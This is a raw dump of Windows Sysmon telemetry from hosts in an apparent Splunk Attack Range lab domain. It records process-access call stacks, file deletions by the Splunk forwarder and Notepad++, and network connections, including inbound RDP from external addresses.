10341000x80000000000000001054574Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:36.249{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntd
ll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054573Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:36.249{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054572Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:36.249{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054583Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:37.848{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=932C784C9958B8E057C1DC6E176C6710,SHA256=4BB5F7A37836D793C0E19B382ED55652CD18BFFCA2755FDF14D27C6A6137B6C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810379Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:37.048{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F42B345919A34FF454184CF439173839,SHA256=071DDC7D1BFD08B738EA86695BD9931985C4A204A9CA28EE83F34A10A6A32672,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054582Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:37.133{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_080734MD5=DA844B439CDDBAF32252CA567375723D,SHA256=E320A8D07D726007039F08B51C9F062E31DA98D37745B5619B1E7AF0A0D52D95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054581Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:37.111{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Program Files\ansible\AttackRangeSysmon.xmlMD5=7C0C4B52054FD15E78DB8A40B9CA49D2,SHA256=B0C36ACDF22162AD79D07D67E63140DF7514E548DA320BC04E293C986A9BC194,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054586Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:38.894{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054585Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:38.878{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8252ED95F461AB092E09E2DDE2BBD824,SHA256=1F7CC70538CECA375F1E3E8A2DACE8683218F7F5EAAE7FD98BE5EFC71707D0C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810380Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:38.048{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=962284FFFD0583F7099406E88C832450,SHA256=B07AF814AFC327AC6ACA7D96992C23279848C240A2A47A02C9C8FAD3DCA23C22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054584Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:38.679{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL 
SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=AD1CDE8ACCF2BCDBBDF188A99A259C19,SHA256=EC4F74A53380E0B3B4FEE4CF5734E9183EFB0B17BA97163D9023A0FE7E8962D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054587Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:39.908{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1ED7101BFA94A1C7C8613133EF39667,SHA256=B1B71A4430A8629C581A7633102AA25967EB8D3EC60BEB1E97019CC7C2EBC86D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810381Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:39.064{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=854B99CB58F424E5D5B4C7589C7F4D3B,SHA256=719E778439722FE98CA95C1228E37CF6137D5E152BFEE14F6F05CA32312BB794,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054599Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:40.947{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054598Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:40.947{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054597Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:40.947{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054596Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:40.947{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054595Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:40.947{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054594Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:40.947{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054593Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:40.947{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054592Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:40.947{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x80000000000000001054591Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:40.909{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACB9E3C07F895C656CC4B31572C2CCAB,SHA256=F1C13F7002AE93A1D178D560AF5E6DB05DEA2E9276A777627FCDC563C823CAC2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810383Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:39.104{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 
SERVICEtcpfalsefalse45.141.87.27-16574-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000810382Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:40.079{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAC1702975D4F684119448E14068C92E,SHA256=6479AF503F0501F34B4E90EF9932016A1713DB4880D619865F2D5347110F1A85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054590Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:40.762{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C8EB7269E1D02F01C5FF7821748D9594,SHA256=AFF88296CC4F4EE3359B30396440F787DE28FF8F95676929BF86F904141A7732,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054589Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:40.762{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FA2F719C540CE801A725BB0A65736173,SHA256=4668C5A00B04B41AF6E52CAB0A14B3224E6F021C1AC5A4C0EA54B4031A9C4764,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054588Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:32.773{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61967-false10.0.1.12-8000- 
354300x8000000000000000810385Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:40.181{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57461-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810384Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:41.095{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33226F4772BAA1142AB5A3EA7BD688EE,SHA256=E75652F5CD8B782FBC3B256C09FB8B4EA928143415C90D240D8C28FF2069F53F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054627Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:32.932{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse95.53.247.168shpd-95-53-247-168.vologda.ru36518-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 10341000x80000000000000001054626Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:41.728{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c